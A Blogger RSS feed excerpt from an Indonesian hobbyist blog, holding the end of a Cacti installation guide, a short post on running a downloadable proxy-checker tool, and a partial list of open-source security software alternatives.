&lt;br /&gt;4. Configuring Cacti&lt;br /&gt;&lt;br /&gt;a. Isikan password root sql kalian (Jangan Sampai Lupa)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;b. Isikan password root sql untuk cacti&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="183" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;c. confirm cacti sql password yang tadi kalian buat&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="185" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti5.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;
&amp;nbsp;d. Pemilihan aplikasi webserver (Pilih Yang Apache2)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti6.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
5. Proses Installasi ( Installation Guide )&lt;br /&gt;&lt;br /&gt;-Akses ip cacti dengan alamat http://localhost/cacti&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="146" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti7.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
-Pilih new installation, kemudian tekan NEXT&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti8.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;-Klik Finish untuk mengakhiri installasi cacti&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="209" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti9.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;6. Login ke dalam cacti&lt;br /&gt;buka browser dan akses ke http://localhost/cacti&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti10.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
7. Penampakan halaman depan cacti kita&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti11.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;8. Dan sekarang kita bisa melihat aktifitas CPU kita di menu graph&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti12.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;taaraaaaaa..cacti udah berjalan di laptop/PC kita&lt;br /&gt;
&lt;br /&gt;untuk selanjutnya silahkan di utak-atik sendiri ea &lt;br /&gt;maklum ane juga masih belajar tentang cacti &lt;br /&gt;semoga artikel cupu ini bermanfaat buat kita semua&lt;br /&gt;
&lt;br /&gt;Wassalamu'alaikum Wr Wb&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hacker-newbie.org/showthread.php?tid=14444"&gt;Sumber&lt;/a&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Proxy Checker</title><link>http://dzhenway.slackerc0de.us/2012/09/proxy-checker.html</link><category>Apa Saja</category><category>Hacking</category><category>Info</category><category>PHP</category><category>Software</category><category>Step by Step</category><pubDate>Sun, 23 Sep 2012 10:15:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-7090456688366716861</guid><description>Assalamu'alaikum Wr Wb &lt;br /&gt;&lt;br /&gt;sesuai dengan judulnya,,ane yakin kalian semua tau gmn ending cerita &lt;br /&gt;&lt;br /&gt;CEKIDOT !!!&lt;br /&gt;&lt;br /&gt;1. Download dulu tool proxy checkernya &lt;a href="http://www.4shared.com/file/31kBkgwk/proxyChecker.html"&gt;Proxy Checker&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Punya list proxy yang mau di cek,, kalau males ngumpulin&lt;br /&gt;nie ane sudah sediain beberapa list proxy yang ane dapet dari segala sumber terpercaya&lt;br /&gt;
&lt;br /&gt;Download disini ea Gays &lt;a href="http://www.4shared.com/office/HSWf0ZWK/lists.html"&gt;List Proxy&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. Setelah 2 hal diatas siap,,selanjutnya kita coba jalanin tool checkernya&lt;br /&gt;ketika ada tulisan "Enter Your Proxy Lists" isi aja nama folder proxy list ente&lt;br /&gt;dan selanjutnya bisa di isi sesuai dengan gambar dibawah ini&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-1-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-1-3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
4. Setelah itu maka kita tinggal tunggu hasilnya aja gays &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-14.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
5. Ketika aksi checkernya sudah selesai,, saatnya kita tes satu-persatu dari hasil checker proxy tersebut. Hasilnya sudah automatis berbentuk .txt dengan nama file works.txt&lt;br /&gt;
&lt;br /&gt;mungkin sekian dulu acara berbagi&lt;br /&gt;
semoga bermanfaat untuk kita semua&lt;br /&gt;
&lt;br /&gt;akhirnya kata, Wassalamu'alaikum Wr Wb&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hacker-newbie.org/showthread.php?tid=14620"&gt;Sumber&lt;/a&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>65 Open Source Replacements for Security Software </title><link>http://dzhenway.slackerc0de.us/2012/09/65-open-source-replacements-for.html</link><category>Apa Saja</category><category>Firewall</category><category>Info</category><category>Security Software</category><category>Software</category><category>Spam</category><pubDate>Sun, 23 Sep 2012 10:05:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-6009464223751812807</guid><description>Assalamu'alaikum Wr Wb&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sudah lama saya tidak membikin postingan di blog ini, akhirnya hari ini ada niat buat ngisi lagi&lt;br /&gt;
&lt;br /&gt;
CEKIDOT !!!&lt;br /&gt;
&lt;br /&gt;
=============================================================&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Anti-Spam&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. &lt;a href="http://www.magicvillage.de/~Fritz_Borgstedt/assp/0003D91C-8000001C/"&gt;ASSP&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway&lt;br /&gt;
&lt;br /&gt;
The self-proclaimed "absolute best SPAM fighting weapon that the world has ever known," ASSP sits on your SMTP servers to stop spam and scan for viruses. Features include browser-based setup, support for most SMTP servers, automatic whitelists, early sender verification, Bayesian filters and more. Operating System: OS Independent.&lt;br /&gt;
&lt;br /&gt;
2. &lt;a href="http://www.mailscanner.info/"&gt;MailScanner&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway&lt;br /&gt;
&lt;br /&gt;
Downloaded more than 1.3 million times by users in 225 countries, MailScanner is a free e-mail security package for mail servers. It incorporates SpamAssassin, ClamAV and a number of other tools to block spam and malware. Operating System: OS Independent.&lt;br /&gt;
&lt;br /&gt;
3. &lt;a href="http://spamassassin.apache.org/"&gt;SpamAssasin&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway&lt;br /&gt;
&lt;br /&gt;
"The powerful #1 open-source spam filter," SpamAssassin uses header and text analysis, Bayesian filtering, DNS blocklists, collaborative filtering databases and other techniques to block spam. The project is managed by the Apache Foundation, and it's been incorporated into a number of other open source and commercial products. Operating System: primarily Linux and OS X, although Windows versions are available.&lt;br /&gt;
&lt;br /&gt;
4. &lt;a href="http://spambayes.sourceforge.net/"&gt;SpamBayes&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway&lt;br /&gt;
&lt;br /&gt;
As you might guess from the name, this project offers a group of Bayesian filters for blocking spam. The site includes versions for Outlook, Outlook Express, Windows Live Mail, IncrediMail, Thunderbird, Gmail, Yahoo Mail and others. Operating System: OS Independent.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Anti-Spyware&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
5. &lt;a href="http://nixory.sourceforge.net/"&gt;Nixory&lt;/a&gt;&lt;br /&gt;
Replaces: SpyBot Search and Destroy, AdAware&lt;br /&gt;
&lt;br /&gt;
Nixory removes and block malicious tracking cookies (aka, spyware) from your system. It supports Mozilla Firefox, Internet Explorer and Google Chrome, and it won't slow your system while you surf. Operating System: OS Independent.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Anti-Virus/Anti-Malware&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
6. &lt;a href="http://www.clamav.net/"&gt;ClamAV&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Avast! Linux Edition, VirusScan Enterprise for Linux&lt;br /&gt;
&lt;br /&gt;
This tremendously popular anti-virus engine has been incorporated into numerous security products and calls itself "the de facto standard for mail gateway scanning." The open source version runs on UNIX or Linux mail servers, but the website also offers a version called Immunetfor individual Windows PCs. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
7. &lt;a href="http://clamtk.sourceforge.net/"&gt;ClamTK&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Avast! Linux Edition, VirusScan Enterprise for Linux&lt;br /&gt;
&lt;br /&gt;
ClamTK makes ClamAV a little bit easier to use by providing a graphical interface for the anti-virus engine. Like the original, this one runs on Linux and scans on demand. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
8. &lt;a href="http://www.clamwin.com/"&gt;ClamWin Free AntiVirus&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kaspersky Anti-Virus, McAfee AntiVirus Plus, Norton Anti-Virus&lt;br /&gt;
&lt;br /&gt;
Based on ClamAV, ClamWin protects more than 600,000 PCs from viruses and malware. Note that unlike most commercial anti-virus packages, ClamWin does not offer an on-access real-time scanner; in order to scan incoming files, you'll need to save them and then run a scan manually before opening or running the files. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
9. &lt;a href="http://p3scan.sourceforge.net/"&gt;P3Scan&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Avast! Linux Edition, VirusScan Enterprise for Linux&lt;br /&gt;
&lt;br /&gt;
With P3Scan, you can set up a transparent proxy server that provides anti-virus and anti-spam protection. Operating System: Linux.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Backup&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
10. &lt;a href="http://amanda.zmanda.com/"&gt;Amanda&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS&lt;br /&gt;
&lt;br /&gt;
Protecting more than 500,000 systems worldwide, Amanda lays claim to the title "most popular open source backup and recovery software in the world." In addition to the community version, it's also available in a supported enterprise edition or as an appliance. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
11. &lt;a href="http://areca.sourceforge.net/"&gt;Areca Backup&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: NovaBackup&lt;br /&gt;
&lt;br /&gt;
Aiming for a balance between simplicity and versatility, Areca offers an easy graphical interface with many options for creating and interacting with archived files. Key features include compression, encryption, delta backup support, archive merges and more. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
12. &lt;a href="http://www.bacula.org/en/"&gt;Bacula&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS&lt;br /&gt;
&lt;br /&gt;
Designed for enterprise users, Bacula backs up multiple systems across a network. Commercial support and services for the popular product are available through Bacula Systems. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
13. &lt;a href="http://clonezilla.org/"&gt;CloneZilla&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Norton Ghost&lt;br /&gt;
&lt;br /&gt;
Created as an alternative to Ghost, Clonezilla can clone single or multiple systems very quickly. It comes in two versions: Clonezilla Live for individual systems and Clonezilla SE for massive networks. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
14. &lt;a href="http://www.partimage.org/Main_Page"&gt;PartiMage&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com&lt;br /&gt;
&lt;br /&gt;
Partimage can create a complete image of your system, which is useful if you need to recover from a full system crash or if you want to configure multiple systems with exactly the same software. It can also create a recovery partition on your drive. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
15. &lt;a href="http://redobackup.org/"&gt;Redo&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com&lt;br /&gt;
&lt;br /&gt;
Calling itself the "easiest, most complete disaster recovery solution available," Redo offers backup, restore and bare-metal recovery capabilities. Even in the most severe emergencies where you must completely replace a drive, Redo claims it can get you back up and running with all of your programs and files in just 10 minutes. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Browsers&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
16. &lt;a href="http://www.chromium.org/Home"&gt;Chromium&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Microsoft Internet Explorer&lt;br /&gt;
&lt;br /&gt;
The open source version of Google Chrome, Chromium tends to be faster and more secure than competing browsers. Key security features include sandboxing, automatic updates, SafeBrowsing and more. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
17. &lt;a href="http://dooble.sourceforge.net/"&gt;Dooble&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Microsoft Internet Explorer&lt;br /&gt;
&lt;br /&gt;
Dooble's developers have created this newer browser with an eye on safety and ease of use. Unlike most other browsers, it automatically encrypts all traffic for greater privacy and security. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
18. &lt;a href="https://www.torproject.org/"&gt;Tor&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Microsoft Internet Explorer&lt;br /&gt;
&lt;br /&gt;
Tor protects your identity by providing anonymity while you browse the Web. It's used by journalists, activists, whistle-blowers and others concerned that someone might be snooping on their online activities. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Browser Add-Ons&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
19. &lt;a href="http://www.mywot.com/"&gt;Web Of Trust&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: McAfee SiteAdvisor Plus&lt;br /&gt;
&lt;br /&gt;
Downloaded more than 33 million times, this popular add-on for Firefox, Internet Explorer, Chrome, Safari or Opera lets users know when they've strayed into websites that are questionable or insecure. It utilizes user ratings to identify sites that perpetuate scams, collect personal information or include unsuitable content, and it ranks them with a green-yellow-red classification system. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
20. &lt;a href="http://passwordmaker.org/"&gt;Password Maker&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kaspersky Password Manager, Roboform&lt;br /&gt;
&lt;br /&gt;
Using the same password all the time puts you at risk, but many people do it anyways because it's so difficult to remember a lot of different passwords. This browser add-on offers a better solution for the problem by creating unique passwords for each site you visit and storing them in an encrypted file that you access with a single master password. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Data Removal&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
21. &lt;a href="http://bleachbit.sourceforge.net/"&gt;BleachBit&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Easy System Cleaner&lt;br /&gt;
&lt;br /&gt;
This helpful utility cleans up your system to protect your privacy and improve performance. It frees up disk space by cleaning junk from more than 90 applications, erasing temporary files, deleting cache and browsing history, and "shredding" unwanted files. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
22. &lt;a href="http://www.heidi.ie/eraser/"&gt;Eraser&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces BCWipe Enterprise&lt;br /&gt;
&lt;br /&gt;
Like BleachBit, Eraser "shreds" deleted files so that they cannot be recovered. It helps protect sensitive information by rewriting over deleted files several times with random data. Operating System: Windows&lt;br /&gt;
&lt;br /&gt;
23. &lt;a href="http://wipe.sourceforge.net/"&gt;Wipe&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces BCWipe Enterprise&lt;br /&gt;
&lt;br /&gt;
Wipe offers the same functionality as Eraser, but it's for Linux instead of Windows. The site also offers a wealth of information for those interested in learning more about how file "shredding" works. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
24. &lt;a href="http://dban.sourceforge.net/"&gt;Darik's Boot And Nuke&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kill Disk, BCWipe Total WipeOut&lt;br /&gt;
&lt;br /&gt;
While Eraser and Wipe delete single files, DBAN securely deletes entire disks. It's very helpful when donating or disposing of an old system. Operating System: OS Independent.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Data Loss Prevention&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
25. &lt;a href="http://code.google.com/p/opendlp/"&gt;OpenDLP&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family&lt;br /&gt;
&lt;br /&gt;
OpenDLP is a "agent- and agentless-based, centrally-managed, massively distributable data loss prevention tool." It allows security or compliance managers to scan thousands of systems simultaneously via agents or perform agentless data discovery against a MySQL or Microsoft SQL server. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
26. &lt;a href="http://www.mydlp.com/"&gt;MyDLP&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family&lt;br /&gt;
&lt;br /&gt;
MyDLP can block credit card numbers, social security numbers, or sensitive files from being transmitted via e-mail, printers, the Web or removable devices. In addition to the free community version, it also comes in a paid enterprise version. Operating System: Windows, Linux, VMware.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Encryption&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
27. &lt;a href="http://www.axantum.com/AxCrypt/"&gt;AxCrypt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces McAfee Anti-Theft, CryptoForge&lt;br /&gt;
&lt;br /&gt;
With nearly 2.5 million registered users, AxCrypt claims to be the "leading open source file encryption software for Windows." It integrates with Windows Explorer—to use it, you simply right-click to encrypt a file or double-click to decrypt. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
28. &lt;a href="http://www.gnupg.org/"&gt;Gnu Privacy Guard&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces PGP Universal Gateway Email Encryption&lt;br /&gt;
&lt;br /&gt;
This Gnu project is a command-line implementation of the popular OpenPGP encryption standard. It supports ElGamal, DSA, RSA, AES, 3DES, Blowfish, Twofish, CAST5, MD5, SHA-1, RIPE-MD-160 and TIGER encryption algorithms. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
29. &lt;a href="http://www.gpgtools.org/"&gt;GPG Tools&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces PGP Universal Gateway Email Encryption&lt;br /&gt;
&lt;br /&gt;
Mac users can download this version of GPG for a more user-friendly way to encrypt e-mail and files. The website includes quite a bit of help and tutorials for new users, which make it even easier to get started using the app. Operating System: OS X.&lt;br /&gt;
&lt;br /&gt;
30. &lt;a href="http://www.gpg4win.org/"&gt;GPG 4 Win&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Cypherus&lt;br /&gt;
&lt;br /&gt;
And this version offers GPG for Windows users, complete with a GUI. It installs quickly and easily, and it protects both files at rest and mail messages. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
31. &lt;a href="http://peazip.sourceforge.net/"&gt;PeaZip&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces WinZip&lt;br /&gt;
&lt;br /&gt;
While it's really a compression utility not an encryption tool, PeaZip also offers strong encryption capabilities, which is why we included it in this section of the list. It also includes two-factor authentication capabilities and secure deletion. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
32. &lt;a href="http://crypt.sourceforge.net/"&gt;Crypt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces McAfee Anti-Theft, CryptoForge&lt;br /&gt;
&lt;br /&gt;
At just 44KB, Crypt is one of the lightest weight encryption utilities available. And because it can encrypt 3MB worth of data in just 0.7 seconds, it's also one of the fastest. However, it doesn't have a GUI, so you'll need to be comfortable with the command line in order to use it. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
33. &lt;a href="http://neocrypt.sourceforge.net/"&gt;NeoCrypt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces McAfee Anti-Theft, CryptoForge&lt;br /&gt;
&lt;br /&gt;
NeoCrypt supports multiple encryption algorithms, including AES, DES, Triple-DES, IDEA, RC4, RC5, CAST-128, BlowFish, SkipJack. It runs from an easy-to-use GUI, and it also integrates with the Windows Shell so that you can encrypt and decrypt files right from Windows Explorer. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
34. &lt;a href="http://code.google.com/p/cryptsetup/"&gt;LUKS/CyrptSetup&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces PGP Whole Disk Encryption&lt;br /&gt;
&lt;br /&gt;
Short for "Linux Unified Key Setup," LUKS calls itself "the standard for Linux hard disk encryption." While many of the other apps on our list encrypt files one by one, LUKS encrypts your entire drive. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
35. &lt;a href="http://freeotfe.org/index.html"&gt;FreeOTFE&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces PGP Whole Disk Encryption&lt;br /&gt;
&lt;br /&gt;
Like LUKS, this app encrypts an entire drive. With it you can create and encrypt virtual disks on your hard drive. It's also highly portable and can run from a thumb drive. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
36. &lt;a href="http://www.truecrypt.org/"&gt;TrueCrypt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces PGP Whole Disk Encryption&lt;br /&gt;
&lt;br /&gt;
One of the most popular open source disk encryption options, TrueCrypt boasts more than 22 million downloads. Thanks to parallelization and pipelining technology, it offers fast reads and writes 0f encrypted information. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Secure File Transfer&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
37. &lt;a href="http://winscp.net/eng/index.php"&gt;WinSCP&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces CuteFTP, FTP Commander&lt;br /&gt;
&lt;br /&gt;
Extremely popular, the award-winning WinSCP includes an SFTP client, SCP client, FTPS client and FTP client. It offers two different interfaces and also includes an integrated text editor. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
38. &lt;a href="http://filezilla-project.org/"&gt;FileZilla&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces CuteFTP, FTP Commander&lt;br /&gt;
&lt;br /&gt;
While WinSCP offers only a client version, FileZilla offers both a client version and a version that allows you to set up your own FTP server. It supports FTP, FTPS and SSH transfer protocol. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Forensics&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
39. &lt;a href="http://odessa.sourceforge.net/"&gt;Odessa&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit&lt;br /&gt;
&lt;br /&gt;
The Open Digital Evidence Search and Seizure Architecture, aka "ODESSA," offers several different tools that for examining and reporting on digital evidence. This is an older project, but still valuable. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
40. &lt;a href="http://www.sleuthkit.org/"&gt;The Sleuth Kit/AutoPsy Browser&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit&lt;br /&gt;
&lt;br /&gt;
